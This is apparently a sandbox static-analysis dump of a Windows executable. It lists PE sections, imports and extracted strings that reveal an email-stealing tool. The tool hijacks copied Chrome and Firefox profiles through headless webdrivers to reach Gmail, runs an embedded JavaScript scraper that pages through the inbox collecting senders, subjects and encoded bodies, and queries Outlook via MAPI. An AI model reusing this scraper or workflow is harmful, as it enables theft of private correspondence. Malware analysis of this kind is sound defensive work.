Static | ZeroBOX

PE Compile Time

2023-03-08 03:26:27

PE Imphash

57b146c278fb2ac0214007b236451fbd

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0003fe94 0x00040000 6.51525100931
.rdata 0x00041000 0x000169fa 0x00016a00 5.32051185149
.data 0x00058000 0x000035bc 0x00002000 4.2565351764
.pdata 0x0005c000 0x00002b50 0x00002c00 5.55278797304
_RDATA 0x0005f000 0x0000015c 0x00000200 3.34658753455
.rsrc 0x00060000 0x000001e0 0x00000200 4.70150325825
.reloc 0x00061000 0x000009b8 0x00000a00 5.39030160869

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00060060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x140041010 LoadLibraryA
0x140041018 GetProcAddress
0x140041020 FreeLibrary
0x140041028 CreateDirectoryW
0x140041030 GetVolumeInformationW
0x140041038 FindFirstFileW
0x140041040 FindNextFileW
0x140041050 GetModuleFileNameW
0x140041058 GetEnvironmentVariableW
0x140041060 CreateMutexW
0x140041068 FindClose
0x140041070 GetFileAttributesW
0x140041078 Sleep
0x140041080 GetLastError
0x140041088 CloseHandle
0x140041090 lstrlenA
0x140041098 GetComputerNameW
0x1400410a0 CreateProcessW
0x1400410a8 CopyFileW
0x1400410b0 lstrcpyW
0x1400410b8 lstrcmpW
0x1400410c0 MultiByteToWideChar
0x1400410c8 ReadFile
0x1400410d0 WriteFile
0x1400410d8 RemoveDirectoryW
0x1400410e0 GetTempPathW
0x1400410e8 CreateFileW
0x1400410f0 DeleteFileW
0x1400410f8 GetFileSize
0x140041100 WideCharToMultiByte
0x140041108 WriteConsoleW
0x140041110 HeapSize
0x140041118 SetEndOfFile
0x140041120 ExitProcess
0x140041128 lstrlenW
0x140041130 GetProcessHeap
0x140041138 SetEnvironmentVariableW
0x140041140 FreeEnvironmentStringsW
0x140041148 GetEnvironmentStringsW
0x140041150 GetCommandLineW
0x140041158 GetCommandLineA
0x140041160 GetOEMCP
0x140041168 GetACP
0x140041170 IsValidCodePage
0x140041178 FindFirstFileExW
0x140041180 ReadConsoleW
0x140041188 SetFilePointerEx
0x140041190 GetFileSizeEx
0x140041198 HeapReAlloc
0x1400411a0 GetConsoleMode
0x1400411a8 GetConsoleOutputCP
0x1400411b0 FlushFileBuffers
0x1400411b8 GetTimeZoneInformation
0x1400411c0 SetStdHandle
0x1400411c8 EnumSystemLocalesW
0x1400411d0 GetUserDefaultLCID
0x1400411d8 IsValidLocale
0x1400411e0 GetLocaleInfoW
0x1400411e8 LCMapStringW
0x1400411f0 CompareStringW
0x1400411f8 HeapFree
0x140041200 GetStringTypeW
0x140041208 EnterCriticalSection
0x140041210 LeaveCriticalSection
0x140041220 DeleteCriticalSection
0x140041228 EncodePointer
0x140041230 DecodePointer
0x140041238 LCMapStringEx
0x140041240 GetCPInfo
0x140041250 SetEvent
0x140041258 ResetEvent
0x140041260 WaitForSingleObjectEx
0x140041268 CreateEventW
0x140041270 GetModuleHandleW
0x140041278 RtlCaptureContext
0x140041280 RtlLookupFunctionEntry
0x140041288 RtlVirtualUnwind
0x140041290 UnhandledExceptionFilter
0x1400412a0 GetCurrentProcess
0x1400412a8 TerminateProcess
0x1400412b8 IsDebuggerPresent
0x1400412c0 GetStartupInfoW
0x1400412c8 QueryPerformanceCounter
0x1400412d0 GetCurrentProcessId
0x1400412d8 GetCurrentThreadId
0x1400412e0 GetSystemTimeAsFileTime
0x1400412e8 InitializeSListHead
0x1400412f0 RtlUnwindEx
0x1400412f8 RtlPcToFileHeader
0x140041300 RaiseException
0x140041308 SetLastError
0x140041310 TlsAlloc
0x140041318 TlsGetValue
0x140041320 TlsSetValue
0x140041328 TlsFree
0x140041330 LoadLibraryExW
0x140041338 GetFileType
0x140041340 SetFileTime
0x140041350 SystemTimeToFileTime
0x140041358 GetModuleHandleExW
0x140041360 GetStdHandle
0x140041368 HeapAlloc
Library USER32.dll:
0x1400413c0 wsprintfW
Library ADVAPI32.dll:
0x140041000 GetUserNameW
Library SHELL32.dll:
0x140041378 ShellExecuteW
Library ole32.dll:
0x140041478 StringFromGUID2
Library WS2_32.dll:
0x140041448 socket
0x140041450 bind
0x140041458 inet_addr
0x140041460 listen
0x140041468 closesocket
Library WININET.dll:
0x1400413f0 InternetCloseHandle
0x1400413f8 InternetSetOptionW
0x140041400 InternetReadFile
0x140041408 InternetOpenW
0x140041418 InternetQueryOptionW
0x140041420 HttpOpenRequestW
0x140041428 InternetConnectW
0x140041430 HttpSendRequestW
0x140041438 InternetCrackUrlW
Library urlmon.dll:
0x140041488 ObtainUserAgentString
Library VERSION.dll:
0x1400413d0 VerQueryValueW
0x1400413d8 GetFileVersionInfoSizeW
0x1400413e0 GetFileVersionInfoW
Library SHLWAPI.dll:
0x140041388 wnsprintfW
0x140041390 StrCmpNIW
0x140041398 StrNCatW
0x1400413a0 PathCombineW
0x1400413a8 wnsprintfA
0x1400413b0 StrCmpNA

!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
L$ SUVWH
l$ VWATAVAWH
A_A^A\_^
\$ UVWH
\$ UVWH
l$ VWAVH
@USVWATAUAVAWH
fB94Bu
fB94Bu
L$X;9s
A_A^A]A\_^[]
UVWATAUAVAWH
fF9,Bu
fF9,Bu
A_A^A]A\_^]
t$ UWAWH
tZD99uJH
x UATAUAVAWH
D$xD9(
D$xD;0
A_A^A]A\]
l$ VWAVH
|$ AVH
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
\$0HcH
UVWAVAWH
_XH9oHu
`A_A^_^]
USVWATAUAVAWH
A_A^A]A\_^[]
USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
A_A^A\_^][
@SUVWAVH
A^_^][
@SUVWAVH
A^_^][
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
WAVAWH
A_A^_
t$ WATAUAVAWH
fB94zu
@8t$@u
A@H90t
A@H90t
A_A^A]A\_
t$ WATAUAVAWH
A_A^A]A\_
l$ VWAVH
\$ UVWAVAWH
A_A^_^]
\$ UVWH
@SUVWAVH
A^_^][
\$ UVWH
UVWATAUAVAWH
A_A^A]A\_^]
@SUVWATAVAWH
@A_A^A\_^][
UVWATAUAVAWH
0A_A^A]A\_^]
x UAVAWH
\$ WATAUAVAWH
pA_A^A]A\_
@SUVWAVH
A^_^][
l$ VWAVH
t$ UWATAVAWH
t$pD8d$pt
A_A^A\_]
UVWATAUAVAWH
D$@L9l$XH
CD$@E3
A_A^A]A\_^]
t$ UWAWH
\$ UVWATAUAVAWH
A_A^A]A\_^]
T$8!\$8L
t<H!\$0L
@USVWATAUAVAWH
U(L9}@H
A_A^A]A\_^[]
x UATAUAVAWH
D8l$0t2I
A_A^A]A\]
x UATAUAVAWH
D8l$@t2H
A_A^A]A\]
3333333
l$ VWAVH
s WAVAWH
H SUVWH
@SUVWAVH
A^_^][
UVWATAVH
@A^A\_^]
\$ UVWATAUAVAWH
0A_A^A]A\_^]
UVWAVAWH
A_A^_^]
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
\$ UVWH
\$ UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
l$ VWATAVAWH
A_A^A\_^
t$ UWAVH
H SUVWH
p WATAUAVAWH
A_A^A]A\_
H SUVWH
UVWAVAWH
`A_A^_^]
UVWATAUAVAWH
3333333
A_A^A]A\_^]
l$ VWAVH
UVWATAUAVAWH
A_A^A]A\_^]
x UATAUAVAWH
O@H;OHs
O@H;OHs
O@H;OHs
O@H;OHs
O@H;OHs
O@H;OHs
O@H;OHs
A_A^A]A\]
O@H;OHs
x AUAVH
Q`H;Y0
I@I;IHs
I@I;IHs
I@I;IHs
I@I;IHs
I@I;IHs
I@I;IHs
|$0A^A]
t$ WATAUAVAWH
A$+AX;A,w
D!WpD!Wt
O@H;OHs
O@H;OHs
O@H;OHs
G$+GX;G,
w\H;wHs
O@H;OHs
D9GTv{
O@H;OHs
O@H;OHs
O@H;OHs
O@H;OHs
O@H;OHs
O@H;OHs
A_A^A]A\_
@SUVWATAUAVAWH
H9C0w>
HA_A^A]A\_^][
G 9o(u"H9
_p)_tH
\$ UVWATAUAVAWH
|$,D9T$`u3A
T$xL;l$h
|$,D;~4s_
H;L$hv
\$(L;l$h
A_A^A]A\_^]
@SUVWATAUAVAWH
A_A^A]A\_^][
x UATAUAVAWH
SHH;D$8
D$ D;C
A_A^A]A\]
UVWATAUAVAWH
t=D;"s8I
tUD;"sPH
I9^(ufA
PA_A^A]A\_^]
UVWATAUAVAWH
ID$PI;
A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
T$hf9}
u>L9|$hM
D$@L;m
A_A^A]A\_^]
\$ UVWH
x ATAVAWH
A_A^A\
UVWATAUAVAWH
EpD9kdu
L;c0vDA
PA_A^A]A\_^]
\$ UVWAVAW
A_A^_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
x UATAUAVAWH
A_A^A]A\]
WAVAWH
@A_A^_
UVWAUAWH
A_A]_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
T$`A9r
f#D$@H
u/HcH<H
H3E H3E
D8L$0uP
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
ffffff
fffffff
fffffff
ffffff
vKfffff
WATAUAVAWH
A_A^A]A\_
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
d$dD;d$ltY
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
WAVAWH
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
SVWATAUAWH
L!d$(L!d$@D
D$HL9gXt
A_A]A\_^[
B(I9A(
SVWATAUAVAWH
0A_A^A]A\_^[
SVWATAUAVAWH
A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
D$ I;R
D$ I9P
WATAUAVAWH
A_A^A]A\_
@USVWATAVAWH
D8d$Xt
A_A^A\_^[]
D$@H;G
t(<#t
<htl<jt\<lt4<tt$<wt
t$ WAVAWH
<Ct-<D
<StW@:
<g~{<itd<ntY<ot7<pt
<utT@:
D<P0@:
k(+sPL
0A_A^_
WATAWH
0A_A\_
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
0A_A^A]A\_^]
t$ WATAUAVAWH
t$HA_A^A]A\_
UVWATAUAVAWH
L$<;L$P
L$4+L$8
l$0D+ D9
L$4+L$H
A_A^A]A\_^]
SUVWATAVAWH
A_A^A\_^][
u"8Z(t
uF8Z(t
vC8_(t
w`HcE H
Hc;9E0t
HcE H+
L$ VWAVH
|$ AVH
|$ UAVAWH
t$ WATAUAVAWH
A_A^A]A\_
;D$Xs;
t$ UWAVH
t$ UWAUAVAWH
A_A^A]_]
s WATAUAVAWH
D$h9t$P
A_A^A]A\_
fffffff
fffffff
fffffff
fffffff
ffffff
fffffff
fffffff
fffffff
fffffff
ffffff
ffffff
ffffff
u"8Z(t
u3HcH<H
x ATAVAWH
A_A^A\
UVWAVAWH
0A_A^_^]
WAVAWH
0A_A^_
WAVAWH
fA94@u
fA94nu
0A_A^_
t$ WAVAWH
A_A^_
WAVAWH
A_A^_
WAVAWH
fE98t'
0A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
9Cu,fD9y
fB9<{u
fD9,pu
t$`fD9+t$I
L$ SUVWH
WATAUAVAWH
0A_A^A]A\_
\$ UVWATAUAVAWH
fD9,Au
A_A^A]A\_^]
\$ UVWATAUAVAWH
f9t$bu
A_A^A]A\_^]
H9L$Ht?H
UVWATAUAVAWH
fE9,Fu
A_A^A]A\_^]
x AUAVAWH
@A_A^A]
VWATAVAWH
?D8d$8t
D8d$8t
t'D8d$8t
%D8d$8t
A_A^A\_^
@UATAUAVAWH
H!T$0D
ue!T$(H!T$
A_A^A]A\]
@8l$Ht
L$ UVWH
WATAUAVAWH
gfffffffH
D8t$ht
A_A^A]A\_
x ATAVAWH
A_A^A\
fD9t$b
u1!D$0H
UVWATAUAVAWH
0A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
WAVAWH
@A_A^_
ATAVAWH
0A_A^A\
D$@H=@W
p WATAUAVAWH
A_A^A]A\_
T$xD;D$x
UVWATAUAVAWH
fD9,Nu
fD9,~u
uHfD9/A
0A_A^A]A\_^]
\$ UVWH
UVWATAUAVAWH
D8\0>t
L$@D8]
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
\$ UVWATAUAVAWH
H!D$ H
`A_A^A]A\_^]
D$0H9D$8
WATAUAVAWH
A_A^A]A\_
@SUVWATAUAVAWH
8A_A^A]A\_^][
L$ SUVWATAUAVAWH
8A_A^A]A\_^][
UVWATAUAVAWH
@8t$HtsL
`A_A^A]A\_^]
s WAVAWH
0A_A^_
u~9t$Xt
UATAUAVAWH
A_A^A]A\]
UWATAVAWH
D8&t4H
A_A^A\_]
ATAVAWH
D8d$8t
@A_A^A\
@USVWATAVAWH
A_A^A\_^[]
@UAVAWH
e0A_A^]
@SUVWATAVAWH
A_A^A\_^][
@UATAUAVAWH
e0A_A^A]A\]
\$ VWATAUAVH
D!l$xA
@A^A]A\_^
u"8Z(t
uF8Z(t
vB8_(t
UVWATAUAVAWH
`A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H97u+A
\$ UVWATAUAVAWH
@8|$Ht
@8|$Ht
@8|$Ht
D$XD9x
@8|$ht
@8|$ht
@8|$ht
A_A^A]A\_^]
UVWATAUAVAWH
L$&8\$&t,8Y
@A_A^A]A\_^]
fD94Fu
WATAUAVAWH
fB94ht
xXI96tSI
fC94wu
0A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
fB9<Hu
fB9<@u
fB9<Bu
fB9,Nu
fB9,Nu
fB9,Nu
fA9,Au
f9)u:H
fB94Ou
x ATAVAWH
A_A^A\
x ATAVAWH
fG9$Ou
0A_A^A\
fB9<Hu
fB9<@u
fB9<Bu
fD94Au
fD94iu
tSf91tNH
tU;\$0tH
WAVAWH
A_A^_
@USVWATAVAWH
tyfD9 tsH
tQfD9 tK
fD9$Hu
@A_A^A\_^[]
WATAUAVAWH
A_A^A]A\_
WAVAWH
A_A^_
@USVWATAVAWH
D8|$0A
A_A^A\_^[]
WAVAWH
A_A^_
x ATAVAWH
@A_A^A\
x ATAVAWH
A_A^A\
UVWATAUAVAWH
@A_A^A]A\_^]
USVWAVH
A^_^[]
USVWAVH
A^_^[]
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
WAVAWH
D8|$`t
A_A^_
UVWAVAWH
@A_A^_^]
ffffff
fffffff
ATAVAWH
A_A^A\
LcA<E3
bad allocation
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
device or resource busy
directory not empty
executable format error
file exists
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid argument
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
no such process
not a directory
not a socket
not a stream
not connected
not enough memory
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
resource deadlock would occur
resource unavailable try again
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
SleepConditionVariableCS
WakeAllConditionVariable
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
(null)
[aOni*{
~ $s%r
@b;zO]
v2!L.2
IND)ind)
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
UUUUUU
UUUUUU
"e?<<<<<<l?
Il?333333c?
.i?0@I
d?000000`?
)|B?d!
L?UUUUUUU?
&?PPPPPPP?
0X8b?~
%GoU?*
(T?j?Y
Zod(^?
D W?{W
qS>g?h3
c?FA@s}
UUUUUU
UUUUUU
UUUUUU
?UUUUUU
?kxG2)
?TY,>5
?!5WOo
?E=$% B
?49HoKC
CorExitProcess
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
_hypot
_nextafter
AreFileApisANSI
CompareStringEx
EnumSystemLocalesEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
LCIDToLocaleName
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
A03>A|
Q5rHg,>
Hk=>:
j>>A?1
.>PJ;I:qE>
:>t6k'
])6M>&
CWD>~3
_oD>Kg
N>O=I9
F>qUxv
/2GG>!B
zY;>u:m
P>q_Y~
0><[cZUg^>
Y>kX>M
H[><y5
[*ncd>0
S>$hkDh$h>[2
UA>N0Wl
9>powf
?8bunz8
?@En[vP
?UUUUUU
?7zQ6$
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
Unknown exception
bad array new length
string too long
iostream
bad cast
bad locale name
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
map/set too long
mapi32.dll
MAPIInitialize
MAPIUninitialize
MAPIAdminProfiles
MAPILogonEx
MAPIFreeBuffer
HrQueryAllRows
HrGetOneProp
FreeProws
invalid string position
Qkkbal
iostream stream error
"type mismatch! call is<type>() before get<type>()" && is<std::string>()
"type mismatch! call is<type>() before get<type>()" && is<array>()
"type mismatch! call is<type>() before get<type>()" && is<object>()
is<object>()
object
{"capabilities":{"alwaysMatch":
sessionId
script
CjvEDhmMwvat9WhWtajICjvEDhmMwvat9WhWtajI
debug_text=%s
if (document.getElementById('mails_output') != null) { return document.getElementById('mails_output').value; } else return false;
https://mail
authuser
LAST_PROFILE
trying to get geckodriver
geckodriver.exe
geckodriver executed, searching profiles
found ff profile (%S), copying
--profile
-headless
binary
moz:firefoxOptions
copied ff profile (%S), trying webdriver
https://mail.google.com/mail/u/
drafts
firefox_%S_gmail%d
%s_%s.txt
%d %s folder done (%S)
trying to get chromedriver
chromedriver.exe
chromedriver executed, searching profiles
found chrome profile (%S), copying
signin
allowed
allowed_on_next_startup
--user-data-dir=%s
--headless
goog:chromeOptions
copied chrome profile (%S), trying webdriver
chrome_%S_gmail%d
system.txt
started, trying chrome mails
chrome mails done, trying ff
ff mails done, processing outlook
outlook_desktop.txt
vector too long
syntax error at line %d near:
\u%04x
file too large
unknown error
127.0.0.1
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.tls$ZZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
v&L*&,
,$T&,(
($8.00
|6P:.<
lstrlenW
lstrlenA
LoadLibraryA
GetProcAddress
FreeLibrary
CreateDirectoryW
GetVolumeInformationW
FindFirstFileW
FindNextFileW
ExpandEnvironmentStringsW
GetModuleFileNameW
GetEnvironmentVariableW
CreateMutexW
FindClose
GetFileAttributesW
GetLastError
CloseHandle
ExitProcess
GetComputerNameW
CreateProcessW
CopyFileW
lstrcpyW
lstrcmpW
MultiByteToWideChar
ReadFile
WriteFile
RemoveDirectoryW
GetTempPathW
CreateFileW
DeleteFileW
GetFileSize
WideCharToMultiByte
KERNEL32.dll
wsprintfW
USER32.dll
GetUserNameW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
StringFromGUID2
ole32.dll
WS2_32.dll
HttpOpenRequestW
InternetQueryOptionW
InternetQueryDataAvailable
InternetOpenW
InternetCrackUrlW
HttpSendRequestW
InternetCloseHandle
InternetConnectW
InternetSetOptionW
InternetReadFile
WININET.dll
ObtainUserAgentString
urlmon.dll
GetFileVersionInfoSizeW
VerQueryValueW
GetFileVersionInfoW
VERSION.dll
StrCmpNIW
wnsprintfA
StrCmpNA
wnsprintfW
StrNCatW
PathCombineW
SHLWAPI.dll
GetStringTypeW
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionEx
DeleteCriticalSection
EncodePointer
DecodePointer
LCMapStringEx
GetCPInfo
InitializeCriticalSectionAndSpinCount
SetEvent
ResetEvent
WaitForSingleObjectEx
CreateEventW
GetModuleHandleW
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
IsDebuggerPresent
GetStartupInfoW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RtlUnwindEx
RtlPcToFileHeader
RaiseException
SetLastError
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
LoadLibraryExW
GetFileType
SetFileTime
TzSpecificLocalTimeToSystemTime
SystemTimeToFileTime
GetModuleHandleExW
GetStdHandle
HeapAlloc
HeapFree
CompareStringW
LCMapStringW
GetLocaleInfoW
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
SetStdHandle
GetTimeZoneInformation
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
HeapReAlloc
GetFileSizeEx
SetFilePointerEx
ReadConsoleW
FindFirstFileExW
IsValidCodePage
GetACP
GetOEMCP
GetCommandLineA
GetCommandLineW
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
GetProcessHeap
SetEndOfFile
HeapSize
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
function triggerMouseEvent (node, eventType) {
var clickEvent = document.createEvent ('MouseEvents');
clickEvent.initEvent (eventType, true, true);
node.dispatchEvent (clickEvent);
function isvisible(obj) {
return obj.offsetWidth > 0 && obj.offsetHeight > 0;
function findVisibleElement(selector)
elements = document.querySelectorAll(selector);
realElem = undefined;
for (i = 0; i < elements.length; ++i)
if (isvisible(elements[i]))
realElem = elements[i];
break;
return realElem;
var outElem = document.getElementById('mails_output');
if (outElem) outElem.remove();
lastMsgsRange = '';
outputEmails = '';
parserCycle = setInterval(function () {
msgsRange = findVisibleElement('[jslog="126438; u014N:cOuCgd,Kr2w4b"]');
if (msgsRange) msgsRange = msgsRange.previousSibling.textContent;
nextPageBtns = document.querySelectorAll('[jslog="126439; u014N:cOuCgd,Kr2w4b"]');
nextPageBtn = undefined;
for (i = 0; i < nextPageBtns.length; ++i)
if (isvisible(nextPageBtns[i]) && nextPageBtns[i].attributes['aria-disabled'] == undefined)
nextPageBtn = nextPageBtns[i];
break;
if (msgsRange == lastMsgsRange) return;
lastMsgsRange = msgsRange;
msgsTable = findVisibleElement('[jsaction="oehdpb:.CLIENT;UXdbee:.CLIENT"]').querySelector('tbody').childNodes;
for (i = 0; i < msgsTable.length; ++i)
if (!isvisible(msgsTable[i])) continue;
msgNode = msgsTable[i];
subject = msgNode.querySelector('[data-thread-id]').textContent.trim();
body = btoa(encodeURIComponent(msgNode.querySelector('[data-thread-id]').parentElement.parentElement.nextSibling.textContent));
outputEmails += `MSG\n`;
emails = msgNode.querySelectorAll('[email]');
for (j = 0; j < emails.length; ++j)
if (!isvisible(emails[j])) continue;
mail = emails[j];
name = '';
if (mail.hasAttribute('name')) name = mail.attributes['name'].textContent;
if (mail.hasAttribute('email'))
email = mail.attributes['email'].textContent;
outputEmails += `mail=${name} <${email}>\n`;
outputEmails += `subject=${subject}\nbody=${body}\n\n`;
if (nextPageBtn == undefined)
clearInterval(parserCycle);
var resultElement = document.createElement("input");
resultElement.setAttribute("type", "hidden");
resultElement.setAttribute("id", "mails_output");
resultElement.setAttribute("value", outputEmails);
document.body.appendChild(resultElement);
return;
triggerMouseEvent(nextPageBtn, "mouseover");
triggerMouseEvent(nextPageBtn, "mousedown");
triggerMouseEvent(nextPageBtn, "mouseup");
triggerMouseEvent(nextPageBtn, "click");
}, 1000);
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVbad_exception@std@@
.?AVfailure@ios_base@std@@
.?AVruntime_error@std@@
.?AVbad_alloc@std@@
.?AVsystem_error@std@@
.?AVbad_cast@std@@
.?AV_System_error@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVoverflow_error@std@@
.?AV_Locimp@locale@std@@
.?AVtype_info@@
.?AV?$basic_stringbuf@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@
.?AV?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AVios_base@std@@
.?AVerror_category@std@@
.?AV_Facet_base@std@@
.?AU_Crt_new_delete@std@@
.?AV?$_Iosb@H@std@@
.?AV_Iostream_error_category2@std@@
.?AV?$basic_iostream@_WU?$char_traits@_W@std@@@std@@
.?AV?$numpunct@_W@std@@
.?AUctype_base@std@@
.?AV?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AVfacet@locale@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_istream@_WU?$char_traits@_W@std@@@std@@
.?AV?$ctype@_W@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
api-ms-win-core-synch-l1-2-0.dll
kernel32.dll
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
minkernel\crts\ucrt\inc\corecrt_internal_strtox.h
__crt_strtox::floating_point_value::as_double
_is_double
__crt_strtox::floating_point_value::as_float
!_is_double
((((( H
((((( H
(
mscoree.dll
LC_ALL
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
